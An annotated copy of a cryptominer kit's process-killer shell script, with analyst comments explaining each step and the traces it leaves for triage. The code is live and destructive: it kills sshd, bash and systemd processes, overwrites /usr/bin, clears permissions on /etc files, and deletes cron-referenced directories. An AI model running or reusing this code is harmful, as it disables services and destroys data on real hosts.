File: //usr/tmp/.X281-unix/.rsync/a/init02
#!/bin/sh
# Analyst overview: this script scans `ps` once, and for every process whose
# CPU share exceeds CPU_THRESHOLD and whose name is not in EXCLUSIONS it
# renices the process, logs to syslog and runs execute(), a broad kill/delete
# sweep. There is no loop or sleep here, so any repetition must come from
# whatever launches the script (not visible in this file).

# Percent CPU trigger. Only the integer part of ps's pcpu is compared, and the
# comparison is strict (-gt), so a process has to reach 21% or more to trigger.
CPU_THRESHOLD=20
# Space-separated list of excluded process names
# These are matched exactly against ps's `comm` column by is_excluded().
# NOTE(review): most entries are spelled like kernel threads, but "kthreadadd"
# is not the usual spelling of kthreadd. Presumably the list shields the kit's
# own payloads running under kernel-thread-like names; confirm against the
# other files of the kit. For triage: a genuine kernel thread has PPID 2 and no
# resolvable /proc/<pid>/exe, so a userspace process using one of these names
# deserves a closer look.
EXCLUSIONS="kswapd0 kauditd0 edac0 kthreadadd python"
# execute: unconditional kill-and-delete sweep, run once per high-CPU hit
# (called from handle_high_cpu). It takes no arguments and never looks at the
# process that triggered it. Everything below matches on names, paths or CPU
# share, so legitimate services that happen to match are hit as well.
# Host artifacts this function leaves behind (useful for triage):
#   - empty, mode-000 files at the paths that get "rm; touch; chmod 0"
#   - a rewritten user crontab
#   - files copied from /usr/bin/dpkgd/ into /usr/bin/
#   - large files directly under /etc with all permission bits cleared
execute() {
# SIGKILL every process whose name matches "sendmail" (a real MTA included).
pkill -9 sendmail
# Default signal (TERM) to any process whose full command line contains
# "/etc/" or "/tmp". This is very broad: daemons started with a config path
# under /etc match too.
pkill -f /etc/
pkill -f /tmp
# Remove the /usr/bin/bsd-port/ tree and signal anything started from it.
rm -rf /usr/bin/bsd-port/
pkill -f /usr/bin/bsd-port
# Clear all permission bits on regular files directly in /etc that find
# considers larger than 1M. No name filter is applied.
find /etc -maxdepth 1 -type f -size +1M -exec chmod 0 {} \;
# Delete two entries from the systemd unit directory.
rm -rf /lib/systemd/system/kswpad
rm -rf /lib/systemd/system/conf.n
# Recurring pattern: delete the path, recreate it as an empty file, then
# chmod 0 it. The result is an empty mode-000 placeholder at that path.
# Presumably meant to keep another tool from re-dropping a file there (TODO
# confirm). For defenders, these placeholders show the script has run.
rm -rf /etc/kswpad; touch /etc/kswpad; chmod 0 /etc/kswpad;
rm -rf /etc/conf.n; touch /etc/conf.n; chmod 0 /etc/conf.n;
rm -rf /usr/bin/.sshd; touch /usr/bin/.sshd; chmod 0 /usr/bin/.sshd
# Chained with &&, so each later pkill runs only if the previous one matched
# at least one process. The names are look-alikes of kernel worker/swap
# threads (kworkel, kswpad, kw0rker), not the real thread names.
pkill -9 kworkel && pkill -9 kswpad && pkill -9 kw0rker
# Same placeholder pattern, applied to a file named "systemd" inside the unit
# directory.
rm -rf /usr/lib/systemd/system/systemd; touch /usr/lib/systemd/system/systemd; chmod 0 /usr/lib/systemd/system/systemd;
# TERM processes whose comm is exactly "systemd" and whose PID is above 3000.
# NOTE(review): the PID cut-off presumably spares PID 1, but a legitimate
# per-user systemd instance started later can exceed 3000 and would be
# killed too.
ps -e -o pid= -o comm= | while read pid comm; do [ "$comm" = "systemd" ] && [ "$pid" -gt 3000 ] && kill "$pid"; done
# TERM processes whose command line starts with /usr/bin/.sshd.
ps -e -o pid= -o args= | while read pid args; do case "$args" in /usr/bin/.sshd*) kill "$pid" ;; esac; done
# TERM processes whose comm is literally "/usr/bin" and whose PID is above 3000.
ps -e -o pid= -o comm= | while read pid comm; do [ "$comm" = "/usr/bin" ] && [ "$pid" -gt 3000 ] && kill "$pid"; done
# Established TCP connections with HTTP as source or destination port: on
# lines containing "linux", take field 6, split it on commas, drop the first
# three characters of the second piece and turn "=" into a space. The rest is
# passed to kill -9. This expects field 6 to be ss's users:(("name",pid=N,..))
# column; which field that is depends on the ss version's output layout.
ss -p state established '( dport = :http or sport = :http )' | awk '/linux/ {split($6, parts, ","); print substr(parts[2], 4)}' | sed 's/=/ /g'| xargs kill -9
# Placeholder at /tmp/linux, then signal anything started from that path.
rm -rf /tmp/linux; touch /tmp/linux; chmod 0 /tmp/linux;
pkill -f /tmp/linux
# The unquoted * is expanded by the shell before pkill runs, so what pkill
# receives depends on the contents of /usr/bin/dpkgd/.
pkill -f /usr/bin/dpkgd/*
# Copies every file in /usr/bin/dpkgd/ over same-named files in /usr/bin/.
# NOTE(review): presumably restores system tools that another implant had
# stashed there (TODO confirm). Files in /usr/bin changed by this step should
# be checked against package checksums.
cp /usr/bin/dpkgd/* /usr/bin/
rm -rf /lib/systemd/system/conf.n; touch /lib/systemd/system/conf.n; chmod 0 /lib/systemd/system/conf.n;
# The pattern is "kswpa". It does not match the string "kswapd0", which is on
# the exclusion list.
pkill -9 kswpa
# SIGKILL any PID whose `ps auxf` line contains kw0rker, llda or dpkgd.
ps auxf|grep -v grep|grep "kw0rker" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "llda" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "dpkgd" | awk '{print $2}'|xargs kill -9
# comm exactly "-bash" with more than 10% CPU: SIGKILL the process and its
# parent. NOTE(review): an ordinary bash normally has comm "bash", so this
# looks aimed at a binary that is itself named "-bash" (compare the /bin/-bash
# path below). Confirm on a live sample.
ps -eo pid=,ppid=,comm=,%cpu= | awk '$3=="-bash" && $4>10 {print $1" "$2}' | while read pid ppid; do kill -9 "$pid" "$ppid"; done
# Placeholders at three bash-themed paths.
rm -rf /tmp/.bash; touch /tmp/.bash; chmod 0 /tmp/.bash;
rm -rf /tmp/.snap-private-bash; touch /tmp/.snap-private-bash; chmod 0 /tmp/.snap-private-bash;
rm -rf /bin/-bash; touch /bin/-bash; chmod 0 /bin/-bash;
# Same ss pipeline as above, selecting lines that contain "bash".
ss -p state established '( dport = :http or sport = :http )' | awk '/bash/ {split($6, parts, ","); print substr(parts[2], 4)}' | sed 's/=/ /g'| xargs kill -9
# Duplicate of the previous line with backslash-escaped parentheses. Inside
# single quotes the backslashes reach ss and awk literally, so this variant
# likely fails to parse. It reads like a copy/paste leftover.
ss -p state established '\( dport = :http or sport = :http \)' | awk '/bash/ {split\($6, parts, ","\); print substr(parts[2], 4)}' | sed 's/=/ /g'| xargs kill -9
# Crontab of the invoking user: for entries containing "bash" or "auth", the
# word following each "cd" is removed recursively with rm -rf. If that
# pipeline succeeds, the crontab is reinstalled without those entries.
# Legitimate jobs that mention bash or auth are dropped as well, so compare
# the crontab against a known-good copy during recovery.
crontab -l | grep -E 'bash|auth' | awk '{for(i=1;i<=NF;i++){if($i=="cd"){print $(i+1)}}}' | xargs -r rm -rf && crontab -l | grep -vE 'bash|auth' | crontab -
# comm matching bash, sshd or system with more than 5% CPU: SIGKILL the
# process and its parent. A busy legitimate sshd, bash or systemd-* process
# qualifies.
ps -eo pid,ppid,comm,%cpu | awk '$3 ~ /(bash|sshd|system)/ && $4>5 {print $1" "$2}' | while read pid ppid; do kill -9 "$pid" "$ppid"; done
# Same "-bash" rule as earlier, with the threshold lowered to 5%.
ps -eo pid,ppid,comm,%cpu | awk '$3=="-bash" && $4>5 {print $1" "$2}' | while read pid ppid; do kill -9 "$pid" "$ppid"; done
# The headers are already suppressed by the "=" suffixes, so NR>1 skips the
# first process rather than a header line. The signal is TERM here, not KILL.
ps -eo pid=,pcpu=,comm= | awk 'NR>1 && $3 ~ /bash/ && $2 > 5 {print $1}' | xargs kill
# Any ps line containing "system" whose PPID (field 2) is above 1000: SIGKILL
# the process and its parent.
ps -eo pid,ppid,comm,%cpu | grep "system" | awk '$2>1000 {print $1" "$2}' | while read pid ppid; do kill -9 "$pid" "$ppid"; done
# Two-line statement below: ps lines containing ten consecutive alphanumeric
# characters and more than 5% CPU yield their PPID. For each PPID an inner
# bash prints it and then walks its children with pgrep -P, one generation at
# a time. The collected PIDs go to `xargs kill -9`. The outer kill only
# receives whatever that xargs printed. Any command name with ten or more
# consecutive alphanumerics matches, not only random-looking ones. This step
# needs bash although the script itself runs under /bin/sh.
kill $(ps -eo pid,ppid,comm,%cpu | grep "[a-zA-Z0-9]\{10\}" | awk '$4>5 {print $2}' | xargs -I {} bash -c 'echo {}; pids=$(pgrep -P {}); while [ ! -z "$pids" ]; do echo $pids;
pids=$(pgrep -P $(echo $pids)); done' | tr '\n' ' ' | xargs kill -9)
}
# handle_high_cpu PID CPU CMD
# Reaction to a single process that exceeded the CPU threshold: report it on
# stdout, lower its priority, write a syslog record, then run the full
# execute() sweep. The sweep is not limited to the reported PID.
# Triage hint: the logger call leaves "High CPU detected: PID=..." lines in
# syslog, which date each time this handler fired.
# Returns: the exit status of execute.
handle_high_cpu() {
  # Plain assignments; POSIX sh has no `local`, so these are script-wide.
  pid=$1 cpu=$2 cmd=$3

  echo "High CPU process detected:"
  echo "PID: $pid | CPU: $cpu% | CMD: $cmd"

  # De-prioritise the process; all renice output is discarded.
  renice 10 -p "$pid" 2>/dev/null 1>&2

  # Record the hit in syslog.
  logger "High CPU detected: PID=$pid CPU=$cpu CMD=$cmd"

  # Host-wide kill/delete sweep.
  execute
}
# is_excluded NAME
# Exact-match lookup of NAME in the whitespace-separated EXCLUSIONS list.
# Globals: EXCLUSIONS (read), cmd (written)
# Returns: 0 when NAME equals one of the entries, 1 otherwise.
is_excluded() {
  cmd=$1
  # Left unquoted so the list is split into individual names.
  for excluded_name in $EXCLUSIONS; do
    [ "$cmd" != "$excluded_name" ] || return 0
  done
  return 1
}
# Single pass over the process table. awk drops the ps header line, then each
# row is read as PID, CPU share and command name. Every row above the
# threshold that is not on the exclusion list goes to handle_high_cpu, so the
# execute() sweep runs once per hit rather than once per scan.
ps -eo pid,pcpu,comm | awk 'NR>1' | while read pid cpu cmd; do
  # Keep only the integer part of the CPU value ("37.5" becomes "37").
  cpu_int=$(echo "$cpu" | cut -d. -f1)

  # At or below the threshold (or not a number): nothing to do for this row.
  [ "$cpu_int" -gt "$CPU_THRESHOLD" ] || continue

  # Names on the exclusion list are never touched.
  if is_excluded "$cmd"; then
    continue
  fi

  handle_high_cpu "$pid" "$cpu" "$cmd"
done